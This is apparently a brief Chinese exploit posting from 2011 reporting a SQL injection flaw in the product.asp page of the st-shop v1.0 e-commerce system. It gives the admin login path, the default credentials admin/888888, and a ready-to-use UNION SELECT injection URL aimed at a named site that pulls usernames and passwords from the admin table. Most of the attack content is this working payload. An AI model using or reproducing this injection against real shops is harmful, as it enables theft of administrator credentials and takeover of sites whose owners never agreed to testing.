st-shop商城系统 v1.0 SQL注入
时间:2011-05-12 来源:Mr.DzY
发布日期:2011-05.12
发布作者:Mr.DzY
漏洞类型:SQL注入
漏洞描述:st-shop商城系统 v1.0程序product.asp页面可SQL注入。
功能简述:
1.最多支持3级商品分类
2.支持图片上传
3.会员管理
4.购物车系统
管理员登录地址:adminlogin.asp
初始用户名及密码:admin/888888
http://www.hackline.net/shop/product.asp?id=1624 and 1=2 union select 1,username,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from admin
标签分类: SQL注入
相关阅读 更多 +
排行榜 更多 +
